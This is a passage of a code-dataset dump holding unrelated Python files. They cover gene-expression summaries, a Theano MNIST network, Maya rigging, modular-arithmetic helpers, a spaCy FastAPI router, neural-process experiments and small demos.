gene_summary.to_csv(gene_summary_file, sep='\\t')\n group_summary_file = out_dir / f'{prefix}.group.exp.summary.txt'\n group_summary.index.name = 'group_id'\n group_summary.loc['Total'] = [len(gene_summary),\n group_summary.exclusive_exp.sum(),\n 1,\n group_summary.exclusive_exp_portion.sum()]\n group_summary.to_csv(group_summary_file, sep='\\t',\n na_rep=0)\n group_num = len(group_df.group_id.unique())\n gene_num_p = gene_summary1 / group_num\n gene_num_dis = pd.cut(\n gene_num_p,\n np.arange(0, 1.2, 0.2),\n labels=np.arange(\n 0, 1, 0.2)).value_counts().sort_index()\n gene_num_dis = DataFrame(gene_num_dis)\n gene_num_dis.index.name = 'group_portion'\n gene_num_dis.columns = ['gene_number']\n gene_num_dis = gene_num_dis.reset_index()\n gene_num_dis.loc[:, 'group_portion'] = gene_num_dis.group_portion.round(1)\n gene_num_dis.loc[:, 'gene_portion'] = gene_num_dis.gene_number / \\\n gene_num_dis.gene_number.sum()\n gene_num_dis_file = out_dir / f'{prefix}.gene_number.distribution.txt'\n gene_num_dis.to_csv(gene_num_dis_file, sep='\\t',\n index=False)\n\n\ndef top_gene_classify(top_gene, gene_ts_type, gene_biotype, outfile):\n top_gene_df = pd.read_table(top_gene)\n gene_type_df = pd.read_table(gene_biotype)\n gene_ts_df = pd.read_table(gene_ts_type,\n header=None,\n names=['Gene_id', 'ts_type'])\n top_gene_df = top_gene_df.merge(gene_ts_df)\n top_gene_df = top_gene_df.merge(gene_type_df,\n left_on='Gene_id',\n right_on='gene_id')\n top_gene_type_df = top_gene_df.groupby(\n ['Group', 'gene_biotype', 'ts_type']).size().unstack(fill_value=0)\n top_gene_count_df = top_gene_df.groupby(['Group', 
'gene_biotype']).size()\n top_gene_type_port_df = top_gene_type_df.div(top_gene_count_df, axis=0)\n top_gene_type_port_df.columns = [f'{each}_portion' for each in\n top_gene_type_port_df.columns]\n top_gene_type_port_df = pd.concat([top_gene_type_df,\n top_gene_type_port_df],\n axis=1)\n top_gene_type_port_df.to_csv(outfile, sep='\\t', float_format='%.3f')\n\n\nif __name__ == '__main__':\n fire.Fire()\n","sub_path":"expression/exp_summary.py","file_name":"exp_summary.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"379831733","text":"from __future__ import print_function\nimport sys\nimport time\nimport theano\nimport theano.tensor as T\nimport theano.tensor.extra_ops as ex\nimport lasagne\nimport load\nimport mini_batch\nimport numpy\nimport fisher_info as info\nimport save_param as files\nimport preprocessing\nfrom scipy.misc import toimage\nfrom lasagne.regularization import regularize_layer_params_weighted, l2, l1\nfrom lasagne.regularization import regularize_layer_params\n\nnumpy.random.seed(25)\ndef build_net(input_var):\n\n\n l_in = lasagne.layers.InputLayer(shape=(None,784),\n input_var=input_var)\n\n l_hid_0 =lasagne.layers.DenseLayer(l_in,num_units=400,nonlinearity=lasagne.nonlinearities.rectify,\n b = None)\n\n l_out = lasagne.layers.DenseLayer(\n\n l_hid_0, num_units=10,\n nonlinearity=lasagne.nonlinearities.softmax,b = None)\n\n return l_out\n\n\n\nprint(\"Loading data...\")\nX_train, y_train, X_val, y_val,X_test,y_test= load.load_minst()\n#X_train, y_train, X_val, y_val = load.load_cifar10()\npass_weight = None\n\ninput_var = T.fmatrix('inputs')\ntarget_var = T.ivector('targets')\n\nprint(\"Building model and...\")\n\nnetwork = build_net(input_var)\nprediction = lasagne.layers.get_output(network)\n\nloss = lasagne.objectives.categorical_crossentropy(prediction, target_var)\nloss = loss.mean()\n\n# Get network params, with specifications of manually updated ones\nparams = lasagne.layers.get_all_params(network, trainable=True)\ngradient = theano.grad(loss, params)\nupdates = lasagne.updates.sgd(loss,params,learning_rate=0.1)\n#updates = lasagne.updates.adam(loss,params)\n#updates = lasagne.updates.nesterov_momentum(loss,params,learning_rate=0.01)\n\ntest_prediction = lasagne.layers.get_output(network, deterministic=True)\ntest_loss = lasagne.objectives.categorical_crossentropy(test_prediction, target_var)\ntest_loss = test_loss.mean()\ntest_acc = T.mean(T.eq(T.argmax(test_prediction, axis=1), target_var),dtype=theano.config.floatX)\n\n# Compile theano function computing the training validation loss and accuracy:\ntrain_fn = theano.function([input_var, target_var], loss, updates=updates)\nval_fn = theano.function([input_var, target_var], [test_loss, test_acc,test_prediction])\ngradient_fn = theano.function([input_var, target_var], gradient)\n\n\n\n# The training loop\nprint(\"Starting training...\")\nnum_epochs = 20\nfor epoch in range(num_epochs):\n\n # In each epoch, we do a full pass over the training data:\n\n train_err = 0\n train_batches = 0\n start_time = time.time()\n\n for batch in mini_batch.iterate_minibatches(X_train, y_train, 500, shuffle=True):\n\n inputs, targets = batch\n train_err += train_fn(inputs, targets)\n train_batches += 1\n\n\n # And a full pass over the validation data:\n val_err = 0\n val_acc = 0\n val_batches = 0\n\n for batch in mini_batch.iterate_minibatches(X_val, y_val, 500, shuffle=False):\n\n inputs, targets = batch\n err, acc,pre = 
val_fn(inputs, targets)\n val_err += err\n val_acc += acc\n val_batches += 1\n\n\n # Then we print the results for this epoch:\n\n print(\"Epoch {} of {} took {:.3f}s\".format(\n epoch + 1, num_epochs, time.time() - start_time))\n\n print(\" training loss:\\t\\t{:.6f}\".format(train_err / train_batches))\n print(\" validation loss:\\t\\t{:.6f}\".format(val_err / val_batches))\n print(\" validation accuracy:\\t\\t{:.2f} %\".format(val_acc / val_batches * 100))\n\n\nval_err,acc,val_predict = val_fn(X_val,y_val)\nprint(val_predict.shape)\ninformation = info.evaluate_fisher_info(gradient_fn,X_val,val_predict,y_val,params)\nfiles.save_information(information,0)\nfiles.save_param(params)\n\nimport matplotlib.pyplot as plt\nplt.hist(information[1].flatten(), bins='auto') # plt.hist passes its arguments to np.histogram\nplt.title(\"Histogram with 'auto' bins\")\nplt.show()\n\"\"\"\nprint(\"Evaluating Fisher Information\")\ninformation = Info.evaluate_fisher_info(gradient_fn,X_val[::10],y_val[::10],params)\nprint(numpy.max(information[1]))\n\n\"\"\"\n","sub_path":"dense_2_layer.py","file_name":"dense_2_layer.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"632148753","text":"import pymel.core as pm\n\nfrom ..utils import libCtrl as controller\n\nreload(controller)\n\n# ------- Global suffixes ------\nBNDJNT = 'BND'\nFKJNT = 'FK'\nIKJNT = 'IK'\nDRVJNT = 'DRV'\nCTRL = 'ctrl'\nCTRLGRP = 'ctrl_grp'\n\n\n# ------------------------------\n\nclass RigNode(object):\n def __init__(self, *args, **kargs):\n self.rnSide = ''\n self.rnMirrored = 0\n self.rnStrLeft = 'L'\n self.rnStrRight = 'R'\n self.rnBndChain = []\n self.rnFkChain = []\n self.rnIkChain = []\n self.rnRbnChain = []\n # -----------------------------\n self.rnJntPos = kargs.setdefault('position', [])\n self.rnName = kargs.setdefault('name', 'rigNode')\n\n def buildBndJnt(self):\n pm.select(cl=1)\n jntList = []\n # create one bind joint per stored position\n for i, pos in enumerate(self.rnJntPos, 1):\n jnt = pm.joint(n=self.rnSide + self.rnName + '_' + str(i) + '_' + BNDJNT, p=pos)\n jntList.append(jnt)\n pm.joint(jntList[0], e=True, oj='xyz', secondaryAxisOrient='yup', zso=True)\n pm.select(cl=1)\n self.rnBndChain = jntList\n\n def setAttributes(self):\n pass\n\n def buildDrv(self, suffix):\n drvChain = []\n for jnt in self.rnBndChain:\n dup = pm.duplicate(jnt, po=1)[0]\n dup.rename(jnt.name().replace(BNDJNT, suffix))\n drvChain.append(dup)\n for i in range((len(drvChain) - 1), 0, -1):\n pm.parent(drvChain[i], drvChain[i - 1])\n '''\n drvRoot = pm.duplicate(self.bndChain[0])[0]\n drvRoot.rename(self.bndChain[0].name().replace(BNDJNT,suffix))\n drvRelatives = drvRoot.listRelatives(ad=True,type='joint',pa=True)\n drvRelatives.reverse()\n toDelete = drvRelatives[3:]\n drvRelatives = drvRelatives[:3]\n pm.delete(toDelete)\n\n for jnt in drvRelatives:\n jnt.rename(jnt.name().split('|')[-1].replace(BNDJNT,suffix))\n\n drvChain = [drvRoot] + drvRelatives\n for jnt in drvChain:\n if 'Roll' in jnt.name():\n print jnt\n #pm.removeJoint(jnt)\n '''\n return drvChain\n","sub_path":"bd_rig/rig/rigNode.py","file_name":"rigNode.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"415698968","text":"# -*- coding: utf-8 -*-\n'''\nCurse of Dimensionality\n\nConcept: Points become the same distance from one another in high dimensional\nspace.\n\nIdea: Show that the distribution of distance between points approaches a \ndelta function at the maximum distance 
between points\n\nMay need to normalize this by the maximum distance between points to be convincing\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.spatial.distance as dm\nimport config as cfg\n\nplt.close()\n\ndef dimbox(ndim,nsamples):\n return np.random.rand(nsamples,ndim)\n\ndef averagedistance(coordinates):\n nvalues = coordinates.shape[0]\n dist_between_points = dm.cdist(coordinates,coordinates)\n dbp = dist_between_points[np.triu_indices(nvalues,k=1)]\n return (dbp.std(),dbp.mean())\n \n# hist,bin_edges = np.histogram(dbp,bins=50)\n# return (hist,bin_edges,np.std(dbp),np.mean(dbp))\n\n# return np.mean(dbp)\n\ndef maxdistance(dim):\n return np.sqrt(dim)\n \n \n \n#dimensions = np.array([1,10,100,1000,10000])\ndimensions = np.round(np.logspace(0,4,40)).astype(int)\nndim = len(dimensions)\nnum_points = 1000\nfraction = np.zeros(ndim)\navg_distance = np.zeros(ndim)\nmax_distance = np.zeros(ndim)\nmin_distance = np.zeros(ndim)\nstd = np.zeros(ndim)\nmean = np.zeros(ndim)\n\nplt.figure(figsize=(6,5))\nfor i,dim in enumerate(dimensions):\n print('Dim = {}'.format(dim))\n # Create the data\n data = dimbox(dim,num_points)\n # Calculate the average distance between points\n# avg_distance[i] = averagedistance(data)\n \n std[i],mean[i] = averagedistance(data)\n \n# hist,bin_edges,var[i],mean[i] = averagedistance(data)\n# plt.plot(bin_edges[:-1],hist/(sum(hist)*(bin_edges[1]-bin_edges[0])),label='{}-d'.format(dim))\n \nplt.semilogx(dimensions,std/mean,color='#00B050',linewidth=2)\n#plt.semilogx(dimensions,avg_distance/max_distance,'k')\n#plt.semilogx(dimensions,max_distance,'k')\n#plt.legend()\nplt.xlabel('Number of Dimensions')\nplt.ylabel('Coefficient of Variation\\n(standard deviation / mean)')\nplt.grid('on')\nplt.tight_layout()\n \nplt.savefig(cfg.dir_figures + 'lecture01e_c.png',dpi=300)","sub_path":"lecture01e_c.py","file_name":"lecture01e_c.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"401647324","text":"import numpy as np\nimport math as m\nimport os\n\ndef multiply(X, Y): ## yields the matrix product X*Y\n result = [[sum(a * b for a, b in zip(X_row, Y_col)) for Y_col in zip(*Y)] for X_row in X]\n return result\n\ndef rotate(matrix, phi):\n xx = m.cos(phi) # cosine of phi in radian\n xy = -m.sin(phi)\n yx = m.sin(phi)\n yy = m.cos(phi)\n rotation = np.array([[xx, xy], [yx, yy]])\n\n return np.matmul(rotation, matrix) ## rotation applied from the left (as last step)\n\ndef mirrorX(): # mirroring at x-axis\n mirror = np.array([[-1, 0], [0, 1]])\n return mirror\n\ndef mirrorY(matrix): # mirroring at y-axis\n mirror = np.array([[1, 0], [0, -1]])\n return mirror\n\n## begin with scaling and mirroring (in arbitrary order) to correctly interpret your results!, rotations on top...\n\ndef scale(xx,yy):\n scale = np.array([[xx, 0], [0, yy]])\n return scale\n\ndef normalize(matrix): ## normalize uniformly to max(det(tensor_field))*Pi for real data to capture relative change (instead of directional)\n det = np.linalg.det(matrix)\n if det != 0:\n c = 1/np.sqrt(det)#*np.pi)\n else:\n c = 0\n\n scale = np.array([[c, 0], [0, c]])\n return np.matmul(scale, matrix)\n\n\n# --> create parameter to control intensity of light src until saturation - inverse mode (black/white) (1-I): \"Negative\"\n\n# calculator of txt file length\ndef file_len(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n return i + 1\n\nidentity = np.array([[1, 0],[0, 1]]) ## row-major 
ordering: row-by-row\nzero = np.array([[0, 0],[0, 0]]) ## row-major ordering: row-by-row\nlength = 101\n\ndeg1 = 90\nrad1 = deg1*(np.pi/180.0)\ndeg2 = 45\nrad2 = deg2*(np.pi/180.0)\nmatrixArray = np.ndarray(shape=(length,length), dtype=np.ndarray) # initialize ndarray w 0\n\n\n# generate normalized tensors from linear transformations\nwith open('temp.txt', 'wb') as f:\n for j in range(length): # rows\n for i in range(length): # cols\n rotated = normalize(identity) # initialization w. zeros\n iInverse = length-1-i # use inverted x coordinates (mirroring at y-axis in array reference frame)\n if i == (length-1)/2:\n scaled = np.matmul(scale(1, 1), identity) # use isotropic scaling (1,1) - src; (0,0) - sink\n else:\n scaled = np.matmul(scale(0.5, 0.5), identity) # chronological transformation order: right->left\n\n normalized = normalize(scaled) # ..->transforms\n matrixArray[j][i] = scaled # update matrixArray entry\n\n np.savetxt(f, matrixArray[j][i], fmt='%s', delimiter=' ', newline='\\r\\n') # add matrix to temp.txt\n\n\n# reorder the output tensor field into a regular grid\ni = 1\nstr1 = \"\"\nstr2 = \"\"\nwith open('temp.txt', 'r+') as txtfile:\n with open('tensor_field.txt', 'w+') as tensor_field:\n for line in txtfile:\n line = line.rstrip() # remove newline/whitespace chars from line ends (the right)\n if i % 2 == 0: # if even line\n str2 += \" \" + line # concatenate row2 (lower line)\n else:\n str1 += \" \" + line # concatenate row1 (upper line)\n\n if i % (2*length) == 0: # if one row (in matrixArray) passed.., write results\n tensor_field.write(str1) # write row 1 (upper line)\n tensor_field.write('\\n' + str2 + '\\n') # write row 2 (lower line)\n str1 = str2 = \"\" # ..reset line strings\n\n i += 1 #increment line index\n\nos.remove('temp.txt')\n","sub_path":"TensorFields/absorb.py","file_name":"absorb.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"267636692","text":"import pgzrun # import the game library\nimport random # import the random library\n\nTILE_SIZE = 50 # size of each small tile, 50*50\nWIDTH = 10*TILE_SIZE # set the window width to 500\nHEIGHT = 10*TILE_SIZE # set the window height to 500\n\nstars = [] # 2D array, an empty list at first, used to store the color number of each small tile\nfor i in range(10): # iterate over the rows\n row = [] # stores the data of one row, an empty list at first\n for j in range(10): # iterate over the columns\n x = random.randint(1, 6) # take a random number between 1 and 6\n row.append(x) # append the value to the row list\n stars.append(row) # then append the row list to the 2D array stars\n\ndef draw(): # drawing module, repeated every frame\n screen.clear() # clear the screen every frame so it can be redrawn\n # draw the numbers of all the small tiles below\n for i in range(10):\n for j in range(10):\n screen.draw.text(str(stars[i][j]),\n (j*TILE_SIZE, i*TILE_SIZE), fontsize=35, color='white')\n\npgzrun.go() # start running the game\n","sub_path":"PygameZero/python游戏趣味编程代码/第11章/11-2-2.py","file_name":"11-2-2.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"349537281","text":"# Important algorithms for cryptography\n\ndef Euclidean(a, b):\n '''\n Find the GCD of a, b using the Euclidean Algorithm\\n\n Inputs:\n integers a, b\n Outputs:\n integer GCD\n Runtime: O(log(min(a,b)))\n '''\n # Iterative so as to not exceed Python recursion depth\n while a != 0:\n temp = a\n a = b % a\n b = temp\n return b\n\ndef GCD(a, b):\n '''\n Find the GCD of a, b using the Euclidean Algorithm\\n\n Alias of Euclidean(a, b)\\n\n Inputs:\n integers a, b\n Outputs:\n integer GCD\n Runtime: O(log(min(a,b)))\n '''\n return Euclidean(a, b)\n\ndef ExtendedEuclidean(a, b):\n '''\n If the GCD of a, b is 1, find x, y such that ax + by = 1\\n\n 
Inputs:\n integers a, b\n Outputs:\n integers GCD, x, y\n '''\n x = 0\n y = 1\n u = 1\n v = 0\n while a != 0:\n # same loop as Euclidean\n\n # Find q, r in b = qa + r\n q, r = b // a, b % a\n\n # Update a, b\n a, b = r, a\n\n # Perform backsubstition, update values\n up, vp = x - u * q, y - v * q\n x, y = u, v\n u, v = up, vp\n return b, x, y\n\ndef ModularInv(a, n, prime=False):\n '''\n Computes the modular inverse of a mod n\\n\n Inputs:\n integers a, n\n (optional) boolean prime\n Outputs:\n integer aInv\n '''\n if prime:\n # Use Fermat's Theorem shortcut: a^-1 = a^(p-2) mod p\n return FastPower(a, n-2, n)\n else:\n GCD, x, y = ExtendedEuclidean(a, n)\n if GCD == 1:\n return x % n\n else:\n raise Exception('ModularInv: ' + str(a) + ' does not have an inverse mod ' + str(n))\n\ndef FastPower(a, e, n):\n '''\n Computes the exponentiation of a^e mod n by successive squaring\\n\n Inputs:\n integers a, e, n\n Output:\n integer aPow\n '''\n return pow(a, e, n)\n\ndef ChineseRemainderThm(a, m, b, n):\n '''\n Finds one modular congruency x = c mod mn that is equivalent to the linear congruencies x = a mod m, x = b mod n\\n\n Inputs:\n integers a, m, b, n\n Outputs:\n integers c, mn\n '''\n g, s, t = ExtendedEuclidean(m, n)\n c = (b * m * s + a * n * t) % (m * n)\n return c, (m * n)\n\n\n\n","sub_path":"Algorithms/Algorithms.py","file_name":"Algorithms.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"309920994","text":"#Take input as an image\r\n#Then compare it with the source and finally print out what numbers are in the input\r\nfrom helpers import takeinput, insert, compare, showresult\r\n\r\ndef main():\r\n\t#Take input image and convert it into 3 parts presenting 3 numbers\r\n\tinputurl = \"C:\\\\Users\\\\Tan\\\\Desktop\\\\digital_screen\\\\DigitsScreen\\\\empty.png\"\r\n\tinputnumbers = takeinput(inputurl)\r\n\t\r\n\t#Import the source number to compare\r\n\tsource = \"C:\\\\Users\\\\Tan\\\\Desktop\\\\digital_screen\\\\source_numbers\\\\\"\r\n\tnumber = insert(source)\r\n\t\r\n\t#Compare the processed input with the source numbers\r\n\tresult = compare(inputnumbers, number)\r\n\t\r\n\t#Format the result into xx,x*C\r\n\tshowresult(result)\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n","sub_path":"digit_scanner.py","file_name":"digit_scanner.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"243510292","text":"import sys\nimport httpx\nimport json\nimport spacy\nimport shutil\nimport subprocess\nfrom pathlib import Path\nfrom typing import Optional\nfrom fastapi import APIRouter, Depends\nfrom fastapi import Request, Form\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.responses import RedirectResponse\n\nfrom app.util.create_object import create_object\nfrom app.util.clone_object import clone_object\nfrom app.util.lookups_data import create_lookups_data, clone_lookups_data\nfrom app.util.login import get_current_username\n\ntemplates = Jinja2Templates(directory=\"app/templates\")\n\nrouter = APIRouter(dependencies=[Depends(get_current_username)])\n# Get list of currently support Language objects from spacy.lang\nspacy_path = Path(spacy.__file__.replace(\"__init__.py\", \"\"))\nspacy_lang = spacy_path / \"lang\"\nspacy_languages = json.dumps([i.stem for i in spacy_lang.iterdir() if len(i.stem) < 3])\n\n\n@router.get(\"/create\")\nasync def create(request: Request):\n # Check 
if a new language exists already, give option to delete if so\n\n new_lang = Path.cwd() / \"new_lang\"\n if len(list(new_lang.iterdir())) > 0:\n name = list(new_lang.iterdir())[0].name\n message = f\"Edit init file<br>Delete {name.title()}<br>Next\"\n return templates.TemplateResponse(\n \"create.html\",\n {\n \"request\": request,\n \"spacy_languages\": spacy_languages,\n \"message\": message,\n },\n )\n else:\n return templates.TemplateResponse(\n \"create.html\", {\"request\": request, \"spacy_languages\": spacy_languages}\n )\n\n\n@router.post(\"/create\")\nasync def create_post(\n request: Request,\n lang_name: str = Form(...),\n lang_code: str = Form(...),\n spacy_language: Optional[str] = Form(None),\n dependencies: Optional[str] = Form(None),\n direction: str = Form(...),\n has_letters: bool = Form(False),\n has_case: bool = Form(False),\n):\n print(has_letters, has_case)\n if dependencies:\n for dep in dependencies.split(\",\"):\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", dep])\n\n if spacy_language:\n lang_name, lang_code = clone_object(lang_name, lang_code, spacy_language)\n clone_lookups_data(lang_name, lang_code, spacy_language)\n\n else:\n lang_name, lang_code = create_object(\n lang_name, lang_code, direction, has_case, has_letters\n )\n create_lookups_data(lang_name, lang_code)\n\n new_lang = Path.cwd() / \"new_lang\"\n if len(list(new_lang.iterdir())) > 0:\n name = list(new_lang.iterdir())[0].name\n message = f\"Edit init file<br>Delete {name.title()}<br>
Next\"\n return templates.TemplateResponse(\n \"create.html\",\n {\n \"request\": request,\n \"spacy_languages\": spacy_languages,\n \"message\": message,\n },\n )\n else:\n return templates.TemplateResponse(\n \"create.html\", {\"request\": request, \"spacy_languages\": spacy_languages}\n )\n\n\n@router.get(\"/delete_new_lang/{name}\")\nasync def delete(name: str):\n new_lang = Path.cwd() / \"new_lang\" / name\n shutil.rmtree(new_lang)\n return RedirectResponse(url=\"/create\")\n\n\n# Select2 endpoint\n@router.get(\"/spacy_languages\") # /spacy_languages?term=Russian&_type=query&q=Russian\nasync def language_options(\n _type: Optional[str] = None, term: Optional[str] = None, q: Optional[str] = None\n):\n response = {}\n response[\"results\"] = []\n\n # TODO automatically load most recent languages.json from explosion\n spacy_languages = httpx.get(\n \"https://raw.githubusercontent.com/explosion/spaCy/8cc5ed6771010322954c2211b0e1f5a0fd14828a/website/meta/languages.json\"\n ).json()\n for lang in spacy_languages[\"languages\"]:\n if q:\n if q in lang[\"name\"]:\n response[\"results\"].append({\"id\": lang[\"name\"], \"text\": lang[\"name\"]})\n else:\n response[\"results\"].append({\"id\": lang[\"name\"], \"text\": lang[\"name\"]})\n\n return response\n","sub_path":"app/routers/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":5129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"51212784","text":"import os.path as osp\nfrom collections import defaultdict\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torch import autograd\nfrom torch.optim import Adam\n\nimport numpy as np\nfrom numpy import array\nfrom numpy.random import choice, randint\n\nfrom generic_map import GenericMap\nfrom base_map import BaseMap\nfrom neural_process import NeuralProcessV1\nfrom aggregators import sum_aggregator, mean_aggregator, tanh_sum_aggregator\n\nfrom tasks.sinusoidal import SinusoidalTask\nfrom tasks.linear import LinearTask\n\nfrom rlkit.core.vistools import save_plot, plot_returns_on_same_plot\nfrom neural_processes.distributions import sample_diag_gaussians, local_repeat\n\n# -----------------------------------------------------------------------------\nN_tasks = 100\nbase_map_lr = encoder_lr = r_to_z_map_lr = 1e-3\nmax_iters = 10001\nnum_tasks_per_batch = 64\nreplace = False\n\ndata_sampling_mode = 'constant'\nnum_per_task_high = 10\n\n# -----------------------------------------------------------------------------\nslopes = np.linspace(-1, 1, N_tasks)\nall_tasks = [LinearTask(slope) for slope in slopes]\ndef generate_data_batch(tasks_batch, num_samples_per_task, max_num):\n # Very inefficient will need to fix this\n X = torch.zeros(len(tasks_batch), max_num, 1)\n Y = torch.zeros(len(tasks_batch), max_num, 1)\n for i, (task, num_samples) in enumerate(zip(tasks_batch, num_samples_per_task)):\n num = int(num_samples)\n x, y = task.sample(num)\n if num==max_num:\n X[i,:] = x\n Y[i,:] = y\n else:\n X[i,:num] = x\n Y[i,:num] = y\n\n return Variable(X), Variable(Y)\n\n# -----------------------------------------------------------------------------\nenc_dim = 40\nencoder = nn.Sequential(\n nn.Linear(2, enc_dim),\n nn.BatchNorm1d(enc_dim),\n nn.ReLU(),\n nn.Linear(enc_dim, enc_dim),\n nn.BatchNorm1d(enc_dim),\n nn.ReLU(),\n nn.Linear(enc_dim, enc_dim)\n)\nclass R2Z(nn.Module):\n def __init__(self):\n super(R2Z, self).__init__()\n dim = 40\n self.hidden = nn.Sequential(\n 
nn.Linear(enc_dim, dim),\n nn.ReLU(),\n nn.BatchNorm1d(dim),\n nn.Linear(dim, dim),\n nn.BatchNorm1d(dim),\n nn.ReLU()\n )\n self.mean_layer = nn.Linear(dim, 1)\n self.log_cov_layer = nn.Linear(dim, 1)\n \n def forward(self, r):\n hid_out = self.hidden(r)\n return self.mean_layer(hid_out), self.log_cov_layer(hid_out)\nr_to_z_map = R2Z()\n\n# class Z2W(nn.Module):\n# def __init__(self):\n# super(Z2W, self).__init__()\n# self.z_l1 = nn.Linear(40,10)\n# self.z_l2 = nn.Linear(40,100)\n# self.z_l3 = nn.Linear(40,10)\n \n# def forward(self, z):\n# return self.z_l1(z), self.z_l2(z), self.z_l3(z)\n# z2w = Z2W()\n\n\n# class BaseMap(nn.Module):\n# def __init__(self):\n# super(BaseMap, self).__init__()\n# dim = 200\n# self.hidden = nn.Sequential(\n# nn.Linear(41, dim),\n# nn.BatchNorm1d(dim),\n# nn.ReLU(),\n# nn.Linear(dim, dim),\n# nn.BatchNorm1d(dim),\n# nn.ReLU(),\n# nn.Linear(dim, dim),\n# nn.BatchNorm1d(dim),\n# nn.ReLU(),\n# nn.Linear(dim, dim),\n# nn.BatchNorm1d(dim),\n# nn.ReLU(),\n# nn.Linear(dim, 1)\n# )\n \n# def forward(self, z, x):\n# return self.hidden(torch.cat([z,x],1))\n# base_map = BaseMap()\n\nencoder_optim = Adam(encoder.parameters(), lr=encoder_lr)\nr_to_z_map_optim = Adam(r_to_z_map.parameters(), lr=r_to_z_map_lr)\n# z2w_optim = Adam(z2w.parameters(), lr=base_map_lr)\n# base_map_optim = Adam(base_map.parameters(), lr=base_map_lr)\n# -----------------------------------------------------------------------------\ntest_elbos = defaultdict(list)\ntest_log_likelihoods = defaultdict(list)\nfor iter_num in range(max_iters):\n task_batch_idxs = choice(len(all_tasks), size=num_tasks_per_batch, replace=replace)\n num_samples_per_task = array([num_per_task_high for _ in range(num_tasks_per_batch)])\n max_num = num_per_task_high\n \n X, Y = generate_data_batch([all_tasks[i] for i in task_batch_idxs], num_samples_per_task, max_num)\n N_tasks, N_samples, X_dim = X.size(0), X.size(1), X.size(2)\n Y_dim = Y.size(2)\n X = X.view(N_tasks*N_samples, X_dim)\n Y = Y.view(N_tasks*N_samples, Y_dim)\n\n encoder_optim.zero_grad()\n r_to_z_map_optim.zero_grad()\n # z2w_optim.zero_grad()\n # base_map_optim.zero_grad()\n\n r = encoder(torch.cat([X,Y], 1))\n r_dim = r.size(-1)\n r = r.view(N_tasks, N_samples, r_dim)\n r = torch.mean(r, 1)\n # r = torch.sum(r, 1)\n mean, log_cov = r_to_z_map(r)\n cov = torch.exp(log_cov)\n\n z = Variable(torch.randn(mean.size())) * cov + mean\n z = local_repeat(z, N_samples)\n\n # Y_pred = base_map(z, X)\n\n Y_pred = X * z\n\n # w1, w2, w3 = z2w(z)\n # w1 = w1.view(-1, 1, w1.size(1))\n # w3 = w3.view(-1, w1.size(-1), 1)\n # Y_pred = torch.matmul(X.view(-1,1,1), w1)\n # Y_pred = torch.matmul(Y_pred, w3)\n # Y_pred = Y_pred.view(-1,1)\n\n KL = -0.5 * torch.sum(\n 1.0 + log_cov - mean**2 - cov\n )\n\n cond_log_likelihood = -0.5 * torch.sum((Y_pred - Y)**2)\n\n neg_elbo = -1.0 * (cond_log_likelihood - KL) / float(N_tasks)\n neg_elbo.backward()\n\n # base_map_optim.step()\n # z2w_optim.step()\n r_to_z_map_optim.step()\n encoder_optim.step()\n\n if iter_num % 100 == 0:\n print('\\nIter %d' % iter_num)\n print('LL: %.4f' % cond_log_likelihood)\n print('KL: %.4f' % KL)\n print('ELBO: %.4f' % (-1.0*neg_elbo))\n print('MSE: %.4f' % (cond_log_likelihood * -2 / (N_tasks * N_samples)))\n","sub_path":"neural_processes/debug_my_neural_process.py","file_name":"debug_my_neural_process.py","file_ext":"py","file_size_in_byte":5778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"372700523","text":"class Pipe:\n def __init__(self, _length, 
_diameter, _number):\n        self.length, self.diameter, self.number = _length, _diameter, _number\n\n    def __str__(self):\n        return str(self.number)\n\n    def __lt__(self, other):\n        if self.length != other.length:  # primary key: length, descending\n            return self.length > other.length\n        if self.diameter != other.diameter:  # secondary key: diameter, ascending\n            return self.diameter < other.diameter\n        return self.number > other.number\n\n\nT = int(input())\nfor i in range(T):\n    n = int(input())\n    pipes = []\n    for j in range(n):\n        length, diameter, number = map(int, input().strip().split())\n        pipes.append(Pipe(length, diameter, number))\n    pipes.sort()\n    print(pipes[0].number)\n","sub_path":"lec20class/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"472981792","text":"#!/usr/bin/env python\n\n\nclass Engineer(object):\n    def say(self, name):\n        print('{}\\'s major is Computer Science and Technology.'.format(name))\n\n\nu = Engineer()\nu.say('Shuo Wang')\nEngineer.say(u, 'Shuo Wang')\n","sub_path":"method.py","file_name":"method.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"81109756","text":"#coding: utf-8\n\nimport os\nimport cv2\nimport logging\nimport sys\nimport yaml\ntry:\n    import cPickle as pickle\nexcept:\n    import pickle\n\nclass AnnotationGenerator:\n\n    CONFIG_YAML = 'config.yml'\n    GENERATOR_WINDOW_NAME = 'generator'\n\n    def __init__(self):\n\n        # log setting\n        program = 